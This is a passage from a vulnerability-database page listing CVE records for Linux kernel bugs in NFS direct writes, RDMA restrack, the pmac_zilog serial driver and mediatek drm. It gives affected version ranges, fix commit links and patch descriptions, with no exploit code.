            {
              "status": "affected",
              "version": "4.5"
            },
            {
              "lessThan": "4.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.297",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.297",
                  "versionStartIncluding": "4.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "4.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "4.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "4.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "4.5",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfs: fix UAF in direct writes\n\nIn production we have been hitting the following warning consistently\n\n------------[ cut here ]------------\nrefcount_t: underflow; use-after-free.\nWARNING: CPU: 17 PID: 1800359 at lib/refcount.c:28 refcount_warn_saturate+0x9c/0xe0\nWorkqueue: nfsiod nfs_direct_write_schedule_work [nfs]\nRIP: 0010:refcount_warn_saturate+0x9c/0xe0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n ? __warn+0x9f/0x130\n ? refcount_warn_saturate+0x9c/0xe0\n ? report_bug+0xcc/0x150\n ? handle_bug+0x3d/0x70\n ? exc_invalid_op+0x16/0x40\n ? asm_exc_invalid_op+0x16/0x20\n ? refcount_warn_saturate+0x9c/0xe0\n nfs_direct_write_schedule_work+0x237/0x250 [nfs]\n process_one_work+0x12f/0x4a0\n worker_thread+0x14e/0x3b0\n ? ZSTD_getCParams_internal+0x220/0x220\n kthread+0xdc/0x120\n ? __btf_name_valid+0xa0/0xa0\n ret_from_fork+0x1f/0x30\n\nThis is because we\u0027re completing the nfs_direct_request twice in a row.\n\nThe source of this is when we have our commit requests to submit, we\nprocess them and send them off, and then in the completion path for the\ncommit requests we have\n\nif (nfs_commit_end(cinfo.mds))\n\tnfs_direct_write_complete(dreq);\n\nHowever since we\u0027re submitting asynchronous requests we sometimes have\none that completes before we submit the next one, so we end up calling\ncomplete on the nfs_direct_request twice.\n\nThe only other place we use nfs_generic_commit_list() is in\n__nfs_commit_inode, which wraps this call in a\n\nnfs_commit_begin();\nnfs_commit_end();\n\nWhich is a common pattern for this style of completion handling, one\nthat is also repeated in the direct code with get_dreq()/put_dreq()\ncalls around where we process events as well as in the completion paths.\n\nFix this by using the same pattern for the commit requests.\n\nBefore with my 200 node rocksdb stress running this warning would pop\nevery 10ish minutes.  With my patch the stress test has been running for\nseveral hours without popping."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-08-28T14:42:40.717Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/6cd3f13aaa62970b5169d990e936b2e96943bc6a"
        },
        {
          "url": "https://git.kernel.org/stable/c/4595d90b5d2ea5fa4d318d13f59055aa4bf3e7f5"
        },
        {
          "url": "https://git.kernel.org/stable/c/80d24b308b7ee7037fc90d8ac99f6f78df0a256f"
        },
        {
          "url": "https://git.kernel.org/stable/c/3abc2d160ed8213948b147295d77d44a22c88fa3"
        },
        {
          "url": "https://git.kernel.org/stable/c/e25447c35f8745337ea8bc0c9697fcac14df8605"
        },
        {
          "url": "https://git.kernel.org/stable/c/1daf52b5ffb24870fbeda20b4967526d8f9e12ab"
        },
        {
          "url": "https://git.kernel.org/stable/c/cf54f66e1dd78990ec6b32177bca7e6ea2144a95"
        },
        {
          "url": "https://git.kernel.org/stable/c/17f46b803d4f23c66cacce81db35fef3adb8f2af"
        }
      ],
      "title": "nfs: fix UAF in direct writes",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26958",
    "datePublished": "2024-05-01T05:19:04.069Z",
    "dateReserved": "2024-02-19T14:20:24.200Z",
    "dateUpdated": "2025-08-28T14:42:40.717Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42080 (GCVE-0-2024-42080)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:52 – Updated: 2026-01-05 10:51

Title

RDMA/restrack: Fix potential invalid address access

Summary

In the Linux kernel, the following vulnerability has been resolved: RDMA/restrack: Fix potential invalid address access struct rdma_restrack_entry's kern_name was set to KBUILD_MODNAME in ib_create_cq(), while if the module exited but forgot del this rdma_restrack_entry, it would cause a invalid address access in rdma_restrack_clean() when print the owner of this rdma_restrack_entry. These code is used to help find one forgotten PD release in one of the ULPs. But it is not needed anymore, so delete them.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8656ef8a9288d6c93…
	https://git.kernel.org/stable/c/782bdaf9d01658281…
	https://git.kernel.org/stable/c/8ac281d42337f36cf…
	https://git.kernel.org/stable/c/f45b43d17240e9ca6…
	https://git.kernel.org/stable/c/ca537a34775c103f7…

Impacted products

Vendor

Product

Version

Linux

Affected: 03286030ac0420c759fa25f5b976e40293bccaaf , < 8656ef8a9288d6c932654f8d3856dc4ab1cfc6b5 (git)
Affected: 03286030ac0420c759fa25f5b976e40293bccaaf , < 782bdaf9d01658281bc813f3f873e6258aa1fd8d (git)
Affected: 03286030ac0420c759fa25f5b976e40293bccaaf , < 8ac281d42337f36cf7061cf1ea094181b84bc1a9 (git)
Affected: 03286030ac0420c759fa25f5b976e40293bccaaf , < f45b43d17240e9ca67ebf3cc82bb046b07cc1c61 (git)
Affected: 03286030ac0420c759fa25f5b976e40293bccaaf , < ca537a34775c103f7b14d7bbd976403f1d1525d8 (git)

Linux

Affected: 4.17
Unaffected: 0 , < 4.17 (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:12.864Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8656ef8a9288d6c932654f8d3856dc4ab1cfc6b5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/782bdaf9d01658281bc813f3f873e6258aa1fd8d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8ac281d42337f36cf7061cf1ea094181b84bc1a9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f45b43d17240e9ca67ebf3cc82bb046b07cc1c61"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ca537a34775c103f7b14d7bbd976403f1d1525d8"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42080",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:19:13.837287Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:07.840Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/core/restrack.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8656ef8a9288d6c932654f8d3856dc4ab1cfc6b5",
              "status": "affected",
              "version": "03286030ac0420c759fa25f5b976e40293bccaaf",
              "versionType": "git"
            },
            {
              "lessThan": "782bdaf9d01658281bc813f3f873e6258aa1fd8d",
              "status": "affected",
              "version": "03286030ac0420c759fa25f5b976e40293bccaaf",
              "versionType": "git"
            },
            {
              "lessThan": "8ac281d42337f36cf7061cf1ea094181b84bc1a9",
              "status": "affected",
              "version": "03286030ac0420c759fa25f5b976e40293bccaaf",
              "versionType": "git"
            },
            {
              "lessThan": "f45b43d17240e9ca67ebf3cc82bb046b07cc1c61",
              "status": "affected",
              "version": "03286030ac0420c759fa25f5b976e40293bccaaf",
              "versionType": "git"
            },
            {
              "lessThan": "ca537a34775c103f7b14d7bbd976403f1d1525d8",
              "status": "affected",
              "version": "03286030ac0420c759fa25f5b976e40293bccaaf",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/infiniband/core/restrack.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.17"
            },
            {
              "lessThan": "4.17",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/restrack: Fix potential invalid address access\n\nstruct rdma_restrack_entry\u0027s kern_name was set to KBUILD_MODNAME\nin ib_create_cq(), while if the module exited but forgot del this\nrdma_restrack_entry, it would cause a invalid address access in\nrdma_restrack_clean() when print the owner of this rdma_restrack_entry.\n\nThese code is used to help find one forgotten PD release in one of the\nULPs. But it is not needed anymore, so delete them."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:51:44.834Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8656ef8a9288d6c932654f8d3856dc4ab1cfc6b5"
        },
        {
          "url": "https://git.kernel.org/stable/c/782bdaf9d01658281bc813f3f873e6258aa1fd8d"
        },
        {
          "url": "https://git.kernel.org/stable/c/8ac281d42337f36cf7061cf1ea094181b84bc1a9"
        },
        {
          "url": "https://git.kernel.org/stable/c/f45b43d17240e9ca67ebf3cc82bb046b07cc1c61"
        },
        {
          "url": "https://git.kernel.org/stable/c/ca537a34775c103f7b14d7bbd976403f1d1525d8"
        }
      ],
      "title": "RDMA/restrack: Fix potential invalid address access",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42080",
    "datePublished": "2024-07-29T15:52:42.228Z",
    "dateReserved": "2024-07-29T15:50:41.170Z",
    "dateUpdated": "2026-01-05T10:51:44.834Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26999 (GCVE-0-2024-26999)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:28 – Updated: 2025-11-04 17:16

Title

serial/pmac_zilog: Remove flawed mitigation for rx irq flood

Summary

In the Linux kernel, the following vulnerability has been resolved: serial/pmac_zilog: Remove flawed mitigation for rx irq flood The mitigation was intended to stop the irq completely. That may be better than a hard lock-up but it turns out that you get a crash anyway if you're using pmac_zilog as a serial console: ttyPZ0: pmz: rx irq flood ! BUG: spinlock recursion on CPU#0, swapper/0 That's because the pr_err() call in pmz_receive_chars() results in pmz_console_write() attempting to lock a spinlock already locked in pmz_interrupt(). With CONFIG_DEBUG_SPINLOCK=y, this produces a fatal BUG splat. The spinlock in question is the one in struct uart_port. Even when it's not fatal, the serial port rx function ceases to work. Also, the iteration limit doesn't play nicely with QEMU, as can be seen in the bug report linked below. A web search for other reports of the error message "pmz: rx irq flood" didn't produce anything. So I don't think this code is needed any more. Remove it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/69a02273e288011b5…
	https://git.kernel.org/stable/c/d679c816929d62af5…
	https://git.kernel.org/stable/c/ab86cf6f8d24e63e9…
	https://git.kernel.org/stable/c/7a3bbe41efa55323b…
	https://git.kernel.org/stable/c/bbaafbb4651fede8d…
	https://git.kernel.org/stable/c/52aaf1ff14622a041…
	https://git.kernel.org/stable/c/ca09dfc3cfdf89e6a…
	https://git.kernel.org/stable/c/1be3226445362bfbf…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 69a02273e288011b521ee7c1f3ab2c23fda633ce (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < d679c816929d62af51c8e6d7fc0e165c9412d2f3 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < ab86cf6f8d24e63e9aca23da5108af1aa5483928 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 7a3bbe41efa55323b6ea3c35fa15941d4dbecdef (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < bbaafbb4651fede8d3c3881601ecaa4f834f9d3f (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 52aaf1ff14622a04148dbb9ccce6d9de5d534ea7 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < ca09dfc3cfdf89e6af3ac24e1c6c0be5c575a729 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 1be3226445362bfbf461c92a5bcdb1723f2e4907 (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.157 , ≤ 5.15.* (semver)
Unaffected: 6.1.88 , ≤ 6.1.* (semver)
Unaffected: 6.6.29 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:16:09.193Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/69a02273e288011b521ee7c1f3ab2c23fda633ce"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d679c816929d62af51c8e6d7fc0e165c9412d2f3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ab86cf6f8d24e63e9aca23da5108af1aa5483928"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7a3bbe41efa55323b6ea3c35fa15941d4dbecdef"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bbaafbb4651fede8d3c3881601ecaa4f834f9d3f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/52aaf1ff14622a04148dbb9ccce6d9de5d534ea7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ca09dfc3cfdf89e6af3ac24e1c6c0be5c575a729"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1be3226445362bfbf461c92a5bcdb1723f2e4907"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26999",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:44:49.996253Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:39.040Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/serial/pmac_zilog.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "69a02273e288011b521ee7c1f3ab2c23fda633ce",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "d679c816929d62af51c8e6d7fc0e165c9412d2f3",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "ab86cf6f8d24e63e9aca23da5108af1aa5483928",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "7a3bbe41efa55323b6ea3c35fa15941d4dbecdef",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "bbaafbb4651fede8d3c3881601ecaa4f834f9d3f",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "52aaf1ff14622a04148dbb9ccce6d9de5d534ea7",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "ca09dfc3cfdf89e6af3ac24e1c6c0be5c575a729",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "1be3226445362bfbf461c92a5bcdb1723f2e4907",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/serial/pmac_zilog.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.157",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.88",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.157",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.88",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.29",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial/pmac_zilog: Remove flawed mitigation for rx irq flood\n\nThe mitigation was intended to stop the irq completely. That may be\nbetter than a hard lock-up but it turns out that you get a crash anyway\nif you\u0027re using pmac_zilog as a serial console:\n\nttyPZ0: pmz: rx irq flood !\nBUG: spinlock recursion on CPU#0, swapper/0\n\nThat\u0027s because the pr_err() call in pmz_receive_chars() results in\npmz_console_write() attempting to lock a spinlock already locked in\npmz_interrupt(). With CONFIG_DEBUG_SPINLOCK=y, this produces a fatal\nBUG splat. The spinlock in question is the one in struct uart_port.\n\nEven when it\u0027s not fatal, the serial port rx function ceases to work.\nAlso, the iteration limit doesn\u0027t play nicely with QEMU, as can be\nseen in the bug report linked below.\n\nA web search for other reports of the error message \"pmz: rx irq flood\"\ndidn\u0027t produce anything. So I don\u0027t think this code is needed any more.\nRemove it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:01:50.540Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/69a02273e288011b521ee7c1f3ab2c23fda633ce"
        },
        {
          "url": "https://git.kernel.org/stable/c/d679c816929d62af51c8e6d7fc0e165c9412d2f3"
        },
        {
          "url": "https://git.kernel.org/stable/c/ab86cf6f8d24e63e9aca23da5108af1aa5483928"
        },
        {
          "url": "https://git.kernel.org/stable/c/7a3bbe41efa55323b6ea3c35fa15941d4dbecdef"
        },
        {
          "url": "https://git.kernel.org/stable/c/bbaafbb4651fede8d3c3881601ecaa4f834f9d3f"
        },
        {
          "url": "https://git.kernel.org/stable/c/52aaf1ff14622a04148dbb9ccce6d9de5d534ea7"
        },
        {
          "url": "https://git.kernel.org/stable/c/ca09dfc3cfdf89e6af3ac24e1c6c0be5c575a729"
        },
        {
          "url": "https://git.kernel.org/stable/c/1be3226445362bfbf461c92a5bcdb1723f2e4907"
        }
      ],
      "title": "serial/pmac_zilog: Remove flawed mitigation for rx irq flood",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26999",
    "datePublished": "2024-05-01T05:28:30.760Z",
    "dateReserved": "2024-02-19T14:20:24.206Z",
    "dateUpdated": "2025-11-04T17:16:09.193Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-38549 (GCVE-0-2024-38549)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:35 – Updated: 2025-11-04 17:21

Title

drm/mediatek: Add 0 size check to mtk_drm_gem_obj

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/mediatek: Add 0 size check to mtk_drm_gem_obj Add a check to mtk_drm_gem_init if we attempt to allocate a GEM object of 0 bytes. Currently, no such check exists and the kernel will panic if a userspace application attempts to allocate a 0x0 GBM buffer. Tested by attempting to allocate a 0x0 GBM buffer on an MT8188 and verifying that we now return EINVAL.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/79078880795478d55…
	https://git.kernel.org/stable/c/be34a1b351ea7faeb…
	https://git.kernel.org/stable/c/d17b75ee9c2e44d3a…
	https://git.kernel.org/stable/c/0e3b6f9123726858c…
	https://git.kernel.org/stable/c/13562c2d48c9ee330…
	https://git.kernel.org/stable/c/af26ea99019caee15…
